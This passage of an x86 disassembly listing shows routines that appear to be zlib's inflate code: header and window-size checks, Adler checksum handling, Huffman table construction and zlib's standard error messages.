loc_50CE39: ; CODE XREF: sub_50CBEB+24A�j
mov esi, [ebp+arg_10]
push 0FFFFFFFDh
pop eax
jmp short loc_50CE8B
; ---------------------------------------------------------------------------
loc_50CE41: ; CODE XREF: sub_50CBEB+229�j
; sub_50CBEB+22F�j
mov ecx, [edi+4]
mov eax, edx
sub ecx, [ebp+var_4]
shr eax, 3
cmp eax, ecx
jnb short loc_50CE52
mov ecx, eax
loc_50CE52: ; CODE XREF: sub_50CBEB+263�j
xor eax, eax
jmp short loc_50CE8B
; ---------------------------------------------------------------------------
loc_50CE56: ; CODE XREF: sub_50CBEB+A6�j
test cl, 20h
jz short loc_50CE70
mov ecx, [edi+4]
mov eax, edx
sub ecx, [ebp+var_4]
shr eax, 3
cmp eax, ecx
jnb short loc_50CE6C
mov ecx, eax
loc_50CE6C: ; CODE XREF: sub_50CBEB+27D�j
push 1
jmp short loc_50CE8A
; ---------------------------------------------------------------------------
loc_50CE70: ; CODE XREF: sub_50CBEB+26E�j
mov ecx, [edi+4]
mov eax, edx
sub ecx, [ebp+var_4]
mov dword ptr [edi+18h], offset aInvalidLiteral ; "invalid literal/length code"
shr eax, 3
cmp eax, ecx
jnb short loc_50CE88
mov ecx, eax
loc_50CE88: ; CODE XREF: sub_50CBEB+299�j
push 0FFFFFFFDh
loc_50CE8A: ; CODE XREF: sub_50CBEB+283�j
pop eax
loc_50CE8B: ; CODE XREF: sub_50CBEB+254�j
; sub_50CBEB+269�j
mov ebx, [ebp+arg_14]
sub [ebp+var_8], ecx
mov [esi+20h], ebx
mov ebx, ecx
shl ebx, 3
sub edx, ebx
mov [esi+1Ch], edx
mov edx, [ebp+var_4]
add ecx, edx
mov [edi+4], ecx
mov ecx, [ebp+var_8]
mov edx, ecx
sub edx, [edi]
mov [edi], ecx
mov ecx, [ebp+var_C]
add [edi+8], edx
mov [esi+34h], ecx
pop edi
pop esi
pop ebx
leave
retn
sub_50CBEB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_50CEBD proc near ; CODE XREF: sub_50CF41+D4�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
xor edx, edx
cmp eax, edx
jz short loc_50CEFB
mov ecx, [eax+1Ch]
cmp ecx, edx
jz short loc_50CEFB
push esi
mov [eax+14h], edx
mov [eax+8], edx
mov [eax+18h], edx
mov esi, [ecx+0Ch]
push edx
neg esi
sbb esi, esi
push eax
and esi, 7
mov [ecx], esi
mov eax, [eax+1Ch]
push dword ptr [eax+14h]
call sub_50BB53
add esp, 0Ch
xor eax, eax
pop esi
pop ebp
retn
; ---------------------------------------------------------------------------
loc_50CEFB: ; CODE XREF: sub_50CEBD+A�j
; sub_50CEBD+11�j
push 0FFFFFFFEh
pop eax
pop ebp
retn
sub_50CEBD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_50CF00 proc near ; CODE XREF: sub_50CF41+C9�p
; sub_50D9F3+59�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push esi
mov esi, [ebp+arg_0]
test esi, esi
jz short loc_50CF3B
mov eax, [esi+1Ch]
test eax, eax
jz short loc_50CF3B
cmp dword ptr [esi+24h], 0
jz short loc_50CF3B
mov eax, [eax+14h]
test eax, eax
jz short loc_50CF28
push esi
push eax
call sub_50C5B0
pop ecx
pop ecx
loc_50CF28: ; CODE XREF: sub_50CF00+1D�j
push dword ptr [esi+1Ch]
push dword ptr [esi+28h]
call dword ptr [esi+24h]
and dword ptr [esi+1Ch], 0
pop ecx
pop ecx
xor eax, eax
jmp short loc_50CF3E
; ---------------------------------------------------------------------------
loc_50CF3B: ; CODE XREF: sub_50CF00+9�j
; sub_50CF00+10�j ...
push 0FFFFFFFEh
pop eax
loc_50CF3E: ; CODE XREF: sub_50CF00+39�j
pop esi
pop ebp
retn
sub_50CF00 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_50CF41 proc near ; CODE XREF: sub_50D02B+E�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
mov eax, [ebp+arg_8]
push ebx
push esi
push edi
xor edi, edi
cmp eax, edi
jz loc_50D023
mov al, [eax]
cmp al, ds:byte_50F0A8
jnz loc_50D023
cmp [ebp+arg_C], 38h
jnz loc_50D023
mov esi, [ebp+arg_0]
cmp esi, edi
jnz short loc_50CF7A
push 0FFFFFFFEh
jmp loc_50D025
; ---------------------------------------------------------------------------
loc_50CF7A: ; CODE XREF: sub_50CF41+30�j
cmp [esi+20h], edi
mov [esi+18h], edi
jnz short loc_50CF8C
mov dword ptr [esi+20h], offset sub_50DA72
mov [esi+28h], edi
loc_50CF8C: ; CODE XREF: sub_50CF41+3F�j
cmp [esi+24h], edi
jnz short loc_50CF98
mov dword ptr [esi+24h], offset sub_50DA8C
loc_50CF98: ; CODE XREF: sub_50CF41+4E�j
push 18h
push 1
pop ebx
push ebx
push dword ptr [esi+28h]
call dword ptr [esi+20h]
add esp, 0Ch
cmp eax, edi
mov [esi+1Ch], eax
jnz short loc_50CFB2
push 0FFFFFFFCh
jmp short loc_50D025
; ---------------------------------------------------------------------------
loc_50CFB2: ; CODE XREF: sub_50CF41+6B�j
mov ecx, [ebp+arg_4]
mov [eax+14h], edi
mov eax, [esi+1Ch]
cmp ecx, edi
mov [eax+0Ch], edi
jge short loc_50CFCA
mov eax, [esi+1Ch]
neg ecx
mov [eax+0Ch], ebx
loc_50CFCA: ; CODE XREF: sub_50CF41+7F�j
cmp ecx, 8
jl short loc_50D01F
cmp ecx, 0Fh
jg short loc_50D01F
mov eax, [esi+1Ch]
shl ebx, cl
mov [eax+10h], ecx
mov eax, [esi+1Ch]
mov eax, [eax+0Ch]
neg eax
sbb eax, eax
push ebx
not eax
and eax, offset sub_4FCF6E
push eax
push esi
call sub_50BBBF
mov ecx, [esi+1Ch]
add esp, 0Ch
mov [ecx+14h], eax
mov eax, [esi+1Ch]
cmp [eax+14h], edi
jnz short loc_50D014
push 0FFFFFFFCh
loc_50D008: ; CODE XREF: sub_50CF41+E0�j
pop edi
push esi
call sub_50CF00
pop ecx
mov eax, edi
jmp short loc_50D026
; ---------------------------------------------------------------------------
loc_50D014: ; CODE XREF: sub_50CF41+C3�j
push esi
call sub_50CEBD
pop ecx
xor eax, eax
jmp short loc_50D026
; ---------------------------------------------------------------------------
loc_50D01F: ; CODE XREF: sub_50CF41+8C�j
; sub_50CF41+91�j
push 0FFFFFFFEh
jmp short loc_50D008
; ---------------------------------------------------------------------------
loc_50D023: ; CODE XREF: sub_50CF41+D�j
; sub_50CF41+1B�j ...
push 0FFFFFFFAh
loc_50D025: ; CODE XREF: sub_50CF41+34�j
; sub_50CF41+6F�j
pop eax
loc_50D026: ; CODE XREF: sub_50CF41+D1�j
; sub_50CF41+DC�j
pop edi
pop esi
pop ebx
pop ebp
retn
sub_50CF41 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_50D02B proc near ; CODE XREF: sub_50D9F3+35�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push [ebp+arg_8]
push [ebp+arg_4]
push 0Fh
push [ebp+arg_0]
call sub_50CF41
add esp, 10h
pop ebp
retn
sub_50D02B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_50D043 proc near ; CODE XREF: sub_50D9F3+47�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ebx
push esi
mov esi, [ebp+arg_0]
xor eax, eax
cmp esi, eax
push edi
jz loc_50D355 ; default
cmp [esi+1Ch], eax
jz loc_50D355 ; default
cmp [esi], eax
jz loc_50D355 ; default
cmp [ebp+arg_4], 4
push 0FFFFFFFBh
pop ebx
mov [ebp+arg_4], ebx
jz short loc_50D076
mov [ebp+arg_4], eax
loc_50D076: ; CODE XREF: sub_50D043+2E�j
; sub_50D043+111�j
push 0Dh
pop edi
loc_50D079: ; CODE XREF: sub_50D043+8A�j
; sub_50D043+FA�j ...
mov eax, [esi+1Ch]
mov ecx, [eax]
cmp ecx, edi ; switch 14 cases
ja loc_50D355 ; default
jmp ds:off_50D36E[ecx*4] ; switch jump
loc_50D08D: ; DATA XREF: _5:off_50D36E�o
mov ecx, [esi+4] ; jumptable 0050D086 case 0
test ecx, ecx
jz loc_50D27F
dec ecx
inc dword ptr [esi+8]
mov [esi+4], ecx
mov ecx, [esi]
mov ebx, [ebp+arg_4]
movzx ecx, byte ptr [ecx]
mov [eax+4], ecx
mov eax, [esi+1Ch]
mov ecx, [eax+4]
and ecx, 0Fh
inc dword ptr [esi]
cmp cl, 8
jz short loc_50D0CF
mov [eax], edi
mov dword ptr [esi+18h], offset aUnknownCompres ; "unknown compression method"
loc_50D0C3: ; CODE XREF: sub_50D043+A3�j
; sub_50D043+237�j
mov eax, [esi+1Ch]
mov dword ptr [eax+4], 5
jmp short loc_50D079
; ---------------------------------------------------------------------------
loc_50D0CF: ; CODE XREF: sub_50D043+75�j
mov ecx, [eax+4]
shr ecx, 4
add ecx, 8
cmp ecx, [eax+10h]
jbe short loc_50D0E8
mov [eax], edi
mov dword ptr [esi+18h], offset aInvalidWindowS ; "invalid window size"
jmp short loc_50D0C3
; ---------------------------------------------------------------------------
loc_50D0E8: ; CODE XREF: sub_50D043+98�j
mov dword ptr [eax], 1
loc_50D0EE: ; CODE XREF: sub_50D043+43�j
; DATA XREF: _5:off_50D36E�o
mov eax, [esi+4] ; jumptable 0050D086 case 1
test eax, eax
jz loc_50D27F
mov ecx, [ebp+arg_4]
dec eax
inc dword ptr [esi+8]
mov [esi+4], eax
mov eax, [esi]
mov [ebp+arg_0], ecx
mov ecx, [esi+1Ch]
push 1Fh
movzx ebx, byte ptr [eax]
inc eax
xor edx, edx
mov [esi], eax
mov eax, [ecx+4]
shl eax, 8
add eax, ebx
pop edi
div edi
test edx, edx
jz short loc_50D142
push 0Dh
mov ebx, [ebp+arg_0]
pop edi
mov [ecx], edi
mov eax, [esi+1Ch]
mov dword ptr [esi+18h], offset aIncorrectHeade ; "incorrect header check"
mov dword ptr [eax+4], 5
jmp loc_50D079
; ---------------------------------------------------------------------------
loc_50D142: ; CODE XREF: sub_50D043+DF�j
test bl, 20h
jnz loc_50D286
mov ebx, [ebp+arg_0]
mov dword ptr [ecx], 7
jmp loc_50D076
; ---------------------------------------------------------------------------
loc_50D159: ; CODE XREF: sub_50D043+43�j
; DATA XREF: _5:off_50D36E�o
push ebx ; jumptable 0050D086 case 7
push esi
push dword ptr [eax+14h]
call sub_50BC4B
mov ebx, eax
add esp, 0Ch
cmp ebx, 0FFFFFFFDh
jnz short loc_50D17E
mov eax, [esi+1Ch]
mov [eax], edi
mov eax, [esi+1Ch]
and dword ptr [eax+4], 0
jmp loc_50D079
; ---------------------------------------------------------------------------
loc_50D17E: ; CODE XREF: sub_50D043+128�j
test ebx, ebx
jnz short loc_50D185
mov ebx, [ebp+arg_4]
loc_50D185: ; CODE XREF: sub_50D043+13D�j
cmp ebx, 1
jnz loc_50D27F
mov eax, [esi+1Ch]
mov ebx, [ebp+arg_4]
lea ecx, [eax+4]
push ecx
push esi
push dword ptr [eax+14h]
call sub_50BB53
mov eax, [esi+1Ch]
add esp, 0Ch
cmp dword ptr [eax+0Ch], 0
jz short loc_50D1B8
mov dword ptr [eax], 0Ch
jmp loc_50D079
; ---------------------------------------------------------------------------
loc_50D1B8: ; CODE XREF: sub_50D043+168�j
mov dword ptr [eax], 8
loc_50D1BE: ; CODE XREF: sub_50D043+43�j
; DATA XREF: _5:off_50D36E�o
mov eax, [esi+4] ; jumptable 0050D086 case 8
test eax, eax
jz loc_50D27F
dec eax
inc dword ptr [esi+8]
mov ecx, [esi+1Ch]
mov [esi+4], eax
mov eax, [esi]
mov ebx, [ebp+arg_4]
movzx eax, byte ptr [eax]
shl eax, 18h
mov [ecx+8], eax
mov eax, [esi+1Ch]
inc dword ptr [esi]
mov dword ptr [eax], 9
loc_50D1EC: ; CODE XREF: sub_50D043+43�j
; DATA XREF: _5:off_50D36E�o
mov eax, [esi+4] ; jumptable 0050D086 case 9
test eax, eax
jz loc_50D27F
mov ecx, [esi]
dec eax
inc dword ptr [esi+8]
mov [esi+4], eax
movzx ecx, byte ptr [ecx]
mov eax, [esi+1Ch]
mov ebx, [ebp+arg_4]
shl ecx, 10h
add [eax+8], ecx
mov eax, [esi+1Ch]
inc dword ptr [esi]
mov dword ptr [eax], 0Ah
loc_50D21A: ; CODE XREF: sub_50D043+43�j
; DATA XREF: _5:off_50D36E�o
mov eax, [esi+4] ; jumptable 0050D086 case 10
test eax, eax
jz short loc_50D27F
mov ecx, [esi]
dec eax
inc dword ptr [esi+8]
mov [esi+4], eax
movzx ecx, byte ptr [ecx]
mov eax, [esi+1Ch]
mov ebx, [ebp+arg_4]
shl ecx, 8
add [eax+8], ecx
mov eax, [esi+1Ch]
inc dword ptr [esi]
mov dword ptr [eax], 0Bh
loc_50D244: ; CODE XREF: sub_50D043+43�j
; DATA XREF: _5:off_50D36E�o
mov eax, [esi+4] ; jumptable 0050D086 case 11
test eax, eax
jz short loc_50D27F
mov ecx, [esi]
dec eax
inc dword ptr [esi+8]
mov [esi+4], eax
movzx ecx, byte ptr [ecx]
mov eax, [esi+1Ch]
mov ebx, [ebp+arg_4]
add [eax+8], ecx
mov eax, [esi+1Ch]
inc dword ptr [esi]
mov ecx, [eax+4]
cmp ecx, [eax+8]
jz loc_50D35D
mov [eax], edi
mov dword ptr [esi+18h], offset aIncorrectDataC ; "incorrect data check"
jmp loc_50D0C3
; ---------------------------------------------------------------------------
loc_50D27F: ; CODE XREF: sub_50D043+4F�j
; sub_50D043+B0�j ...
mov eax, ebx
jmp loc_50D358
; ---------------------------------------------------------------------------
loc_50D286: ; CODE XREF: sub_50D043+102�j
mov eax, [esi+1Ch]
mov ebx, [ebp+arg_0]
mov dword ptr [eax], 2
loc_50D292: ; CODE XREF: sub_50D043+43�j
; DATA XREF: _5:off_50D36E�o
mov eax, [esi+4] ; jumptable 0050D086 case 2
test eax, eax
jz short loc_50D27F
dec eax
inc dword ptr [esi+8]
mov ecx, [esi+1Ch]
mov [esi+4], eax
mov eax, [esi]
mov ebx, [ebp+arg_4]
movzx eax, byte ptr [eax]
shl eax, 18h
mov [ecx+8], eax
mov eax, [esi+1Ch]
inc dword ptr [esi]
mov dword ptr [eax], 3
loc_50D2BC: ; CODE XREF: sub_50D043+43�j
; DATA XREF: _5:off_50D36E�o
mov eax, [esi+4] ; jumptable 0050D086 case 3
test eax, eax
jz short loc_50D27F
mov ecx, [esi]
dec eax
inc dword ptr [esi+8]
mov [esi+4], eax
movzx ecx, byte ptr [ecx]
mov eax, [esi+1Ch]
mov ebx, [ebp+arg_4]
shl ecx, 10h
add [eax+8], ecx
mov eax, [esi+1Ch]
inc dword ptr [esi]
mov dword ptr [eax], 4
loc_50D2E6: ; CODE XREF: sub_50D043+43�j
; DATA XREF: _5:off_50D36E�o
mov eax, [esi+4] ; jumptable 0050D086 case 4
test eax, eax
jz short loc_50D27F
mov ecx, [esi]
dec eax
inc dword ptr [esi+8]
mov [esi+4], eax
movzx ecx, byte ptr [ecx]
mov eax, [esi+1Ch]
mov ebx, [ebp+arg_4]
shl ecx, 8
add [eax+8], ecx
mov eax, [esi+1Ch]
inc dword ptr [esi]
mov dword ptr [eax], 5
loc_50D310: ; CODE XREF: sub_50D043+43�j
; DATA XREF: _5:off_50D36E�o
mov eax, [esi+4] ; jumptable 0050D086 case 5
test eax, eax
jz loc_50D27F
mov ecx, [esi]
dec eax
inc dword ptr [esi+8]
mov [esi+4], eax
movzx ecx, byte ptr [ecx]
mov eax, [esi+1Ch]
push 2
add [eax+8], ecx
mov eax, [esi+1Ch]
inc dword ptr [esi]
mov ecx, [eax+8]
mov [esi+30h], ecx
mov dword ptr [eax], 6
jmp short loc_50D357
; ---------------------------------------------------------------------------
loc_50D342: ; CODE XREF: sub_50D043+43�j
; DATA XREF: _5:off_50D36E�o
mov eax, [esi+1Ch] ; jumptable 0050D086 case 6
mov [eax], edi
mov eax, [esi+1Ch]
mov dword ptr [esi+18h], offset aNeedDictionary ; "need dictionary"
and dword ptr [eax+4], 0
loc_50D355: ; CODE XREF: sub_50D043+D�j
; sub_50D043+16�j ...
push 0FFFFFFFEh ; default
loc_50D357: ; CODE XREF: sub_50D043+2FD�j
; sub_50D043+325�j ...
pop eax
loc_50D358: ; CODE XREF: sub_50D043+23E�j
pop edi
pop esi
pop ebx
pop ebp
retn
; ---------------------------------------------------------------------------
loc_50D35D: ; CODE XREF: sub_50D043+228�j
mov eax, [esi+1Ch]
mov dword ptr [eax], 0Ch
loc_50D366: ; CODE XREF: sub_50D043+43�j
; DATA XREF: _5:off_50D36E�o
push 1 ; jumptable 0050D086 case 12
jmp short loc_50D357
; ---------------------------------------------------------------------------
loc_50D36A: ; CODE XREF: sub_50D043+43�j
; DATA XREF: _5:off_50D36E�o
push 0FFFFFFFDh ; jumptable 0050D086 case 13
jmp short loc_50D357
sub_50D043 endp
; ---------------------------------------------------------------------------
off_50D36E dd offset loc_50D08D ; DATA XREF: sub_50D043+43�r
dd offset loc_50D0EE ; jump table for switch statement
dd offset loc_50D292
dd offset loc_50D2BC
dd offset loc_50D2E6
dd offset loc_50D310
dd offset loc_50D342
dd offset loc_50D159
dd offset loc_50D1BE
dd offset loc_50D1EC
dd offset loc_50D21A
dd offset loc_50D244
dd offset loc_50D366
dd offset loc_50D36A
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_50D3A6 proc near ; CODE XREF: sub_50BC4B+3C5�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
push esi
mov esi, [ebp+arg_10]
push 4
push 13h
push dword ptr [esi+28h]
call dword ptr [esi+20h]
add esp, 0Ch
mov [ebp+arg_10], eax
test eax, eax
jnz short loc_50D3CB
push 0FFFFFFFCh
pop eax
jmp short loc_50D422
; ---------------------------------------------------------------------------
loc_50D3CB: ; CODE XREF: sub_50D3A6+1E�j
push ebx
push eax
lea eax, [ebp+var_4]
push eax
push [ebp+arg_C]
push [ebp+arg_4]
push [ebp+arg_8]
push 0
push 0
push 13h
push 13h
push [ebp+arg_0]
call sub_50D425
mov ebx, eax
add esp, 28h
cmp ebx, 0FFFFFFFDh
jnz short loc_50D3FD
mov dword ptr [esi+18h], offset aOversubscribed ; "oversubscribed dynamic bit lengths tree"...
jmp short loc_50D414
; ---------------------------------------------------------------------------
loc_50D3FD: ; CODE XREF: sub_50D3A6+4C�j
cmp ebx, 0FFFFFFFBh
jz short loc_50D40A
mov eax, [ebp+arg_4]
cmp dword ptr [eax], 0
jnz short loc_50D414
loc_50D40A: ; CODE XREF: sub_50D3A6+5A�j
push 0FFFFFFFDh
mov dword ptr [esi+18h], offset aIncompleteDyna ; "incomplete dynamic bit lengths tree"
pop ebx
loc_50D414: ; CODE XREF: sub_50D3A6+55�j
; sub_50D3A6+62�j
push [ebp+arg_10]
push dword ptr [esi+28h]
call dword ptr [esi+24h]
pop ecx
mov eax, ebx
pop ecx
pop ebx
loc_50D422: ; CODE XREF: sub_50D3A6+23�j
pop esi
leave
retn
sub_50D3A6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_50D425 proc near ; CODE XREF: sub_50D3A6+3F�p
; sub_50D7AC+52�p ...
var_F0 = dword ptr -0F0h
var_B4 = dword ptr -0B4h
var_B0 = dword ptr -0B0h
var_74 = dword ptr -74h
var_70 = dword ptr -70h
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
arg_24 = dword ptr 2Ch
push ebp
mov ebp, esp
sub esp, 0F0h
mov ecx, [ebp+arg_0]
push ebx
push esi
push edi
mov edi, [ebp+arg_4]
xor edx, edx
mov [ebp+var_74], edx
mov [ebp+var_70], edx
mov [ebp+var_6C], edx
mov [ebp+var_68], edx
mov [ebp+var_64], edx
mov [ebp+var_60], edx
mov [ebp+var_5C], edx
mov [ebp+var_58], edx
mov [ebp+var_54], edx
mov [ebp+var_50], edx
mov [ebp+var_4C], edx
mov [ebp+var_48], edx
mov [ebp+var_44], edx
mov [ebp+var_40], edx
mov [ebp+var_3C], edx
mov [ebp+var_38], edx
mov esi, edi
loc_50D46B: ; CODE XREF: sub_50D425+54�j
mov eax, [ecx]
add ecx, 4
inc [ebp+eax*4+var_74]
lea eax, [ebp+eax*4+var_74]
dec esi
jnz short loc_50D46B
cmp [ebp+var_74], edi
jnz short loc_50D491
mov eax, [ebp+arg_14]
mov [eax], edx
mov eax, [ebp+arg_18]
mov [eax], edx
loc_50D48A: ; CODE XREF: sub_50D425+36F�j
; sub_50D425+379�j
xor eax, eax
loc_50D48C: ; CODE XREF: sub_50D425+382�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_50D491: ; CODE XREF: sub_50D425+59�j
mov edi, [ebp+arg_18]
push 1
pop ebx
lea eax, [ebp+var_70]
mov esi, [edi]
mov ecx, ebx
mov [ebp+arg_18], esi
loc_50D4A1: ; CODE XREF: sub_50D425+87�j
cmp [eax], edx
jnz short loc_50D4AE
inc ecx
add eax, 4
cmp ecx, 0Fh
jbe short loc_50D4A1
loc_50D4AE: ; CODE XREF: sub_50D425+7E�j
cmp esi, ecx
mov [ebp+var_4], ecx
jnb short loc_50D4B8
mov [ebp+arg_18], ecx
loc_50D4B8: ; CODE XREF: sub_50D425+8E�j
push 0Fh
lea esi, [ebp+var_38]
pop eax
loc_50D4BE: ; CODE XREF: sub_50D425+A3�j
cmp [esi], edx
jnz short loc_50D4CA
dec eax
sub esi, 4
cmp eax, edx
jnz short loc_50D4BE
loc_50D4CA: ; CODE XREF: sub_50D425+9B�j
cmp [ebp+arg_18], eax
mov [ebp+var_18], eax
jbe short loc_50D4D5
mov [ebp+arg_18], eax
loc_50D4D5: ; CODE XREF: sub_50D425+AB�j
mov esi, [ebp+arg_18]
shl ebx, cl
cmp ecx, eax
mov [edi], esi
jnb short loc_50D4F6
lea esi, [ebp+ecx*4+var_74]
loc_50D4E4: ; CODE XREF: sub_50D425+CF�j
sub ebx, [esi]
js loc_50D61C
inc ecx
add esi, 4
shl ebx, 1
cmp ecx, eax
jb short loc_50D4E4
loc_50D4F6: ; CODE XREF: sub_50D425+B9�j
mov esi, eax
shl esi, 2
mov edi, [ebp+esi+var_74]
lea ecx, [ebp+esi+var_74]
sub ebx, edi
mov [ebp+var_30], ebx
js loc_50D61C
add edi, ebx
mov [ebp+var_B0], edx
mov [ecx], edi
xor ecx, ecx
dec eax
jz short loc_50D530
xor edi, edi
loc_50D51F: ; CODE XREF: sub_50D425+109�j
add ecx, [ebp+edi+var_70]
add edi, 4
dec eax
mov [ebp+edi+var_B0], ecx
jnz short loc_50D51F
loc_50D530: ; CODE XREF: sub_50D425+F6�j
mov ebx, [ebp+arg_0]
xor edi, edi
loc_50D535: ; CODE XREF: sub_50D425+136�j
mov eax, [ebx]
add ebx, 4
cmp eax, edx
jz short loc_50D557
mov ecx, [ebp+eax*4+var_B4]
mov edx, [ebp+arg_24]
lea eax, [ebp+eax*4+var_B4]
mov [edx+ecx*4], edi
inc ecx
mov [eax], ecx
xor edx, edx
loc_50D557: ; CODE XREF: sub_50D425+117�j
inc edi
cmp edi, [ebp+arg_4]
jb short loc_50D535
mov eax, [ebp+esi+var_B4]
mov ebx, [ebp+arg_18]
or [ebp+var_8], 0FFFFFFFFh
mov [ebp+arg_4], eax
mov eax, [ebp+arg_24]
mov [ebp+var_C], edx
mov [ebp+var_10], eax
mov eax, [ebp+var_4]
neg ebx
cmp eax, [ebp+var_18]
mov [ebp+var_B4], edx
mov [ebp+var_F0], edx
mov [ebp+var_1C], edx
mov [ebp+arg_0], edx
jg loc_50D791
mov edi, [ebp+var_24]
lea ecx, [eax-1]
lea eax, [ebp+eax*4+var_74]
mov [ebp+var_2C], ecx
mov [ebp+var_20], eax
loc_50D5A7: ; CODE XREF: sub_50D425+366�j
mov eax, [ebp+var_20]
mov eax, [eax]
mov ecx, eax
dec eax
test ecx, ecx
mov [ebp+var_14], eax
jz loc_50D77B
loc_50D5BA: ; CODE XREF: sub_50D425+350�j
mov eax, [ebp+arg_18]
add eax, ebx
cmp [ebp+var_4], eax
jle loc_50D6A6
loc_50D5C8: ; CODE XREF: sub_50D425+279�j
mov ecx, [ebp+arg_18]
inc [ebp+var_8]
add eax, ecx
add ebx, ecx
mov [ebp+var_34], eax
mov eax, [ebp+var_18]
sub eax, ebx
cmp eax, ecx
mov [ebp+arg_0], eax
jbe short loc_50D5E4
mov [ebp+arg_0], ecx
loc_50D5E4: ; CODE XREF: sub_50D425+1BA�j
mov ecx, [ebp+var_4]
mov edx, [ebp+var_14]
push 1
sub ecx, ebx
pop eax
shl eax, cl
inc edx
cmp eax, edx
jbe short loc_50D623
mov esi, [ebp+var_20]
or edx, 0FFFFFFFFh
sub edx, [ebp+var_14]
add eax, edx
cmp ecx, [ebp+arg_0]
jnb short loc_50D623
loc_50D606: ; CODE XREF: sub_50D425+1F5�j
inc ecx
cmp ecx, [ebp+arg_0]
jnb short loc_50D623
mov edx, [esi+4]
add esi, 4
shl eax, 1
cmp eax, edx
jbe short loc_50D623
sub eax, edx
jmp short loc_50D606
; ---------------------------------------------------------------------------
loc_50D61C: ; CODE XREF: sub_50D425+C1�j
; sub_50D425+E3�j ...
push 0FFFFFFFDh
jmp loc_50D7A6
; ---------------------------------------------------------------------------
loc_50D623: ; CODE XREF: sub_50D425+1CF�j
; sub_50D425+1DF�j ...
mov eax, [ebp+arg_20]
push 1
pop edx
mov eax, [eax]
shl edx, cl
mov [ebp+arg_0], edx
lea esi, [eax+edx]
cmp esi, 5A0h
ja short loc_50D61C
mov edx, [ebp+arg_1C]
lea eax, [edx+eax*8]
mov edx, [ebp+var_8]
mov [ebp+var_1C], eax
lea edx, [ebp+edx*4+var_F0]
mov [edx], eax
mov eax, [ebp+arg_20]
mov [eax], esi
mov eax, [ebp+var_8]
test eax, eax
jz short loc_50D690
mov esi, [ebp+var_C]
mov edi, [ebp+var_1C]
mov [ebp+eax*4+var_B4], esi
mov eax, [ebp+arg_18]
mov byte ptr [ebp+var_28], cl
mov ecx, ebx
mov byte ptr [ebp+var_28+1], al
sub ecx, eax
mov eax, esi
shr eax, cl
mov ecx, [edx-4]
mov edx, [ebp+var_28]
sub edi, ecx
sar edi, 3
sub edi, eax
mov [ecx+eax*8], edx
mov [ecx+eax*8+4], edi
jmp short loc_50D698
; ---------------------------------------------------------------------------
loc_50D690: ; CODE XREF: sub_50D425+235�j
mov eax, [ebp+arg_14]
mov ecx, [ebp+var_1C]
mov [eax], ecx
loc_50D698: ; CODE XREF: sub_50D425+269�j
mov eax, [ebp+var_34]
cmp [ebp+var_4], eax
jg loc_50D5C8
xor edx, edx
loc_50D6A6: ; CODE XREF: sub_50D425+19D�j
mov al, byte ptr [ebp+var_4]
mov ecx, [ebp+arg_4]
sub al, bl
mov byte ptr [ebp+var_28+1], al
mov eax, [ebp+arg_24]
lea ecx, [eax+ecx*4]
mov eax, [ebp+var_10]
cmp eax, ecx
jb short loc_50D6C4
mov byte ptr [ebp+var_28], 0C0h
jmp short loc_50D6FB
; ---------------------------------------------------------------------------
loc_50D6C4: ; CODE XREF: sub_50D425+297�j
mov eax, [eax]
cmp eax, [ebp+arg_8]
jnb short loc_50D6DF
cmp eax, 100h
mov edi, eax
sbb cl, cl
and cl, 0A0h
add cl, 60h
mov byte ptr [ebp+var_28], cl
jmp short loc_50D6F7
; ---------------------------------------------------------------------------
loc_50D6DF: ; CODE XREF: sub_50D425+2A4�j
sub eax, [ebp+arg_8]
mov ecx, [ebp+arg_10]
shl eax, 2
mov cl, [eax+ecx]
add cl, 50h
mov byte ptr [ebp+var_28], cl
mov ecx, [ebp+arg_C]
mov edi, [eax+ecx]
loc_50D6F7: ; CODE XREF: sub_50D425+2B8�j
add [ebp+var_10], 4
loc_50D6FB: ; CODE XREF: sub_50D425+29D�j
mov ecx, [ebp+var_4]
mov eax, [ebp+var_C]
push 1
sub ecx, ebx
pop esi
shl esi, cl
mov ecx, ebx
shr eax, cl
cmp eax, [ebp+arg_0]
jnb short loc_50D72F
mov ecx, [ebp+var_1C]
lea ecx, [ecx+eax*8]
loc_50D717: ; CODE XREF: sub_50D425+306�j
mov edx, [ebp+var_28]
add eax, esi
mov [ecx], edx
mov edx, esi
shl edx, 3
mov [ecx+4], edi
add ecx, edx
